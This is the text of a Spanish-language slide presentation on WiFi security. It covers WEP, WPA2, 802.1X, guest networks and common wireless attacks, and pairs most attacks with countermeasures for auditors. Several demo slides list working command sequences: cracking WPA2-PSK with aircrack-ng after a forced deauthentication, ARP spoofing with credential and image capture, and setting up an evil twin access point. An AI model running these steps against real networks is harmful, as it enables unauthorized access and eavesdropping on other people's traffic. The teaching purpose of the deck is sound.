3. 2.4GHz vs 5 GHz
2.4 GHz 5 GHz
802.11b/g/n 802.11a/n/ac
Mayor Alcance Menor alcance
Cualquier dispositivo Menos compatible
3 canales no solapados 24 canales no solapados
Congestionado con WIFI Menos congestión con WIFI
Muchas interferencias externas Muy pocas interferencias externas
4. ¿Por que solo 3 canales?
... si yo he visto hasta 14...
● Universal: 1,6,11
● Europa: 1,5,9,13
8. Autenticación
● Open System
● Realmente no hay autenticación
● Solo se verifica la compatibilidad
● Shared Key
● Realmente es PEOR que el anterior (si, en serio)
● Envía un desafío en texto claro. Facilita el ataque a
la clave WEP
● No sólo afecta a autenticación, también a cifrado
9. WEP (¿Es un chiste?)
● Wired Equivalent Privacy. Un nombre desafortunado
● 64 o 128 bits (24 bits de IV). Usa RC4
● El IV se envía en plano
● Sólo tenemos 24 bits de IV. El IV se repiten cada
2^24 tramas (5 horas con tráfico)
● Weak Key Attack: RC4 genera claves débiles
● Reinjection Attack: para acelerar la colisión de IV
● Bit-Flipping Attack: El CRC es considerado débil, lo
que permite modificar un paquete sin que el ICV lo
detecte
● Combinando los ataques anteriores, se puede
romper el cifrado WEP en menos de 5 minutos
10. Filtros por MAC
● Control de acceso por dirección física (MAC)
● No definido en estándar, pero implementado por
fabricantes
● Gestión engorrosa (aunque es posible centralizar con
Radius)
● No es seguro, modificar una MAC es TRIVIAL
11. Redes “Invisibles” (SSID Cloack)
● Las redes se anuncian mediante paquetes “beacon”
● Para "ocultar" la red, el ESSID puede ir a NULL
● Passive/Active Scanning (Beacon/Probe)
● El AP responderá con el ESSID a cualquier cliente que
ponga el ESSID en el probe
● Con un sniffer o analizador de protocolo se descubre
la red "oculta" de forma inmediata
● "Seguridad por desconocimiento" -> Mala seguridad
● No esta definido en el estándar. Depende de la
implementación del fabricante
13. “Amendment” 802.11i – 2004
● Introduce nuevas soluciones para Autenticación y
Cifrado
● Incluído en Estándar 802.11-2007 y posteriores
● Fué adoptado por fabricantes antes de ratificarse. La
WIFI Alliance lo definió como WPA (WIFI Protected
Access)
● Una vez ratificado, la WIFI Alliance definió WPA2
14. Mejoras introducidas en 802.11i
● Robust Network Security: Nueva máquina de estados
● Autenticación: Se añade 802.1X/EAP
● Cifrado: Nuevos algoritmos y protocolos
● Intercambio de claves: 4-Way Handshake
● Cifrado: TKIP/RC4 y CCMP/AES
15. Robust Network Security
● Todo el tráfico esta cifrado y autenticado
● RNSA: RNS Association
● Se utilizan 2 claves “maestras” generadas
durante la autenticación
● Pairwise Master Key: unicast
● Group Master Key: broadcast / multicast
● Con las anteriores, se generan claves
temporales usadas para cifrar:
● Pairwise Transient Key: unicast
● Group Transient Key: broadcast /
multicast
● Estas ultimas se generan mediante el 4-
Way Handshake
16. 802.1X/EAP (WPA2/Enterprise)
● No es una tecnología WIFI (también para redes
cableadas)
● Componentes
● Supplicant: Dispositivo Wifi
● Authenticator: AP Wifi
● Authentication server: Servidor Radius
● Varios tipos de EAP (algunos inseguros)
● LEAP: No estándar e inseguro, NO USAR
● EAP-TLS: Estándar, basada en certificados digitales
● PEAP: Estándar y seguro (Tunel TLS. Autenticación
del servidor con certificado digital)
18. PreShared Key: WPA2/Personal
● Se realiza el 4-Way Handshake a partir de una clave
compartida previamente (PSK)
● WPA: Antes de la ratificación
● TKIP/RC4
● WPA2: Después de la ratificación
● TKIP/RC4
● CCMP/AES
● DPSK: Dynamic PSK (claves compartidas diferentes
para cada cliente)
● Resuelve los problemas de PSK sin la complejidad
de 802.1X
● No esta definido en el estándar
● Pocos fabricantes lo tienen
19. 4-Way handshake
Partimos de las claves maestras:
● En 802.1X la PMK se intercambia
en la autenticación y es DISTINTA
para cada usuario
● En WPA2/Personal (PSK), la
PMK se deriva de la clave
compartida
O cómo crear claves de cifrado de forma segura...
21. Otras consideraciones
● Segmentación de trafico
● VLANs: Por ESSID u por usuario (Radius)
● RBAC: Usuarios, roles y permisos
● Seguridad de la infraestructura
● Seguridad física
● Seguridad de interfaz de gestión
● Redes Privadas Virtuales (VPN): Siempre que
estemos en redes publicas
22. Guest WLAN
● Deben mapearse a una VLAN especifica aislada
● Debe protegerse mediante firewalls que bloqueen el
acceso a las redes de la organización
● No debe permitirse el acceso a los equipos WIFI
● Permitir sólo servicios controlados
● Aislamiento de clientes
● Captive Web Portal: Autenticación y aceptación de
condiciones
● Gestión de invitados: Creación dinámica de usuarios,
etc
24. Particularidades
● Acceso físico y alcance no delimitado
● Universalidad y Ubiquidad (y va a más)
● Cualquier red pública (Internet, Cybers, WIFI, etc) es
un “entorno hostil”
● Desconocimiento de los riesgos
● Los dispositivos no siempre muestran la información
necesaria para protegerse
● Se sacrifica la “seguridad” por la “usabilidad”
● Lo siento, pero.... ¡¡¡Falta de Sentido Común!!!
25. Atacante vs Auditor
Atacante:
● Software: Kali Linux o similar
● Hardware: Adaptadores WIFI “avanzados”
● Un poco de “cerebro” (tampoco demasiado)
Auditor:
● Las mismas herramientas que el atacante
● Herramienta de análisis del medio físico (analizador
de espectro)
● Algo más de cerebro que el atacante (el auditor debe
entender cómo funcionan los ataques)
26. Descubrimiento, Análisis y
Escuchas Ilegales
● Medio compartido en frecuencia libre
● Cualquiera tiene acceso
● A menudo redes sin protección
● PSK global (fácil acceso o ingeniería social)
● Herramientas de monitorización y descubrimiento
(WIFI e IP)
● Donde esta el limite?
● Herramientas de descubrimiento y analisis
● WIFI: WifiAnalyzer, InSSIDer, WiFiFoFum, WIFI
Scanner, etc
● Red: Analizadores de protocolo (WireShark, EyePA,
etc)
28. Denial of Service (DoS)
● Físico: Ataque al medio de transmisión
● Se detecta con analizador de espectro
● Intencionado: WIFI Jammer
● Accidental: interferencias
● Lógico:
● Se detecta con analizador de protocolo o WIDS
● Varios tipo: Assoc flood, Auth Flood, PS-Poll flood,
Virtual carrier attack, DeAuth
Contramedidas
● Físico: No existen. Monitorización
● Lógico: 802.11w Management Frame Protection
29. DoS Físico
Ataque: WIFI Jammer
Interferencia: Transmisor A / V
Solo se detecta con analizador de espectro
34. Rogue AP (AP no autorizados)
● Accidental o intencionado
● Acceso a la red cableado sin restricciones
● OJO con las conexiones Ad-hoc en equipos
conectados a la red
Contramedidas:
● Seguridad en red cableada (802.1X y 802.1AE)
● Monitorización y detección (WIDS/WIPS)
35. Ataques al cifrado
● Acceso a la infraestructura (riesgo similar a Rogue
AP)
● También abre la puerta a ataques peer to peer
● WPA2/Personal (PSK) vulnerable a ataque de
diccionario (DEMO)
● 802.1X/EAP: LEAP vulnerable, NO USAR
● Usar certificados autofirmados o con CA propia!
Contramedidas
● No usar PSK (Usar 802.11X o DPSK)
● Si no queda mas remedio, usar claves largas y
complicadas
● !a@s#d$f%g555 !@#$%1234pacr1234!@#$%
36. DEMO: Ataque a cifrado WPA2/PSK
●Activamos modo monitor
● airodump-ng start wlan0
● Monitorizamos trafico para elegir la victima
● airodump-ng mon0
● Necesitamos capturar un 4-Way Handshake de esa
estación
● airodump-ng --bssid BSSID --channel CANAL -w psk mon0
● Desconectamos a la victima para forzar un handshake
● aireplay-ng --deauth 1 -a BSSID -c MAC_VICTIMA mon0
● Una vez capturado el handshake podemos lanzar el
ataque de diccionario
● aircrack-ng -w rockyou.txt psk-01.cap
37. Otros ataques
● MAC Spoofing (no ARP spoof)
● Ataque a filtros por MAC
● Falsa sensación de seguridad
● Trivial
● Management Interface Exploits
● Ataque a infraestructuras mediante los protocolos de
gestión
Contramedidas
● No usar filtros MAC como única medida de seguridad
(ni en WIFI, ni en nada)
● No permitir acceso de gestión desde redes no
confiables
39. Ataques Peer to Peer (a usuarios)
● Redes Ad-hoc
● Redes públicas (o semipúblicas)
● Mismo segmento de red (nivel 2)
Contramedidas
● Protección particular (firewall)
● Utilización de VPN en redes publicas
● Aislamiento de clientes
40. WIFI Hijack
● ARP Spoof:
● Necesitamos estar en la misma red que la víctima
● Permite capturar trafico destinado a otra máquina
● Evil twin:
● Mismo ESSID (y BSSID) que el "legitimo"
● Man in the Middle (MITM): No necesariamente WIFI
● Capturas de trafico, claves, imágenes, etc
● Ataques MITM a SSL (webmitm y sslstrip)
Contramedidas:
● AP publico "falso": Usar siempre VPN
● Evil Twin: Usar 802.1X/EAP
● ARP Spoof: Protección ARP spoof
● MITM en general: En red publica usar VPN
41. DEMO: ARP Spoof y MITM
● Activamos enrutado
● echo 1 > /proc/sys/net/ipv4/ip_forward
● Escaneo la red y elijo a la victima
● nmap -sP 192.168.43.1/24
● ARP Spoof
● arpspoof -i wlan1 -r -t IP_VICTIMA IP_ROUTER
● Ojo con iptables, permitir todo el trafico
● Capturar url
● urlsnarf -i wlan1
● Capturar imagenes
● driftnet -i wlan1
● Capturar claves
● dsniff -i wlan1
42. Demo “Evil Twin”
● Seleccionamos el ESSID que queremos atacar
● Preparamos una configuración DHCP similar a la de la
red "real"
● Levantamos el AP falso
● airbase-ng --essid ESSID mon0
● Levantamos el interfaz at0 con la misma IP que la red
"real"
● ifconfig at0 192.168.43.1 netmask 255.255.255.0 up
● Levantamos el dhcp
● dhcpd at0 -f
● Nos anunciamos con mas potencia que el AP “victima”
● Forzamos desconexión de la/s victimas
44. Ataques MITM
● Consiste en “situarse” en el medio de las
comunicaciones de la victima
● Necesario para capturar tráfico cifrado
DEMO:
● webmitm
● Interceptamos las conexiones SSL y “suplantamos”
al servidor de destino para capturar el trafico cifrado
● Sslstrip
● Modifica los enlaces a paginas seguras (HTTPS)
para que sigan usando conexiones inseguras (HTTP)